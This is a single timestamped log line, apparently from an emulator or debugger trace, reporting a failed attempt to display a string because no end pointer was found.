2018-12-25T11:46:02.190776261Z 9 PC: 12c5b | Display string (Could not find end pointer)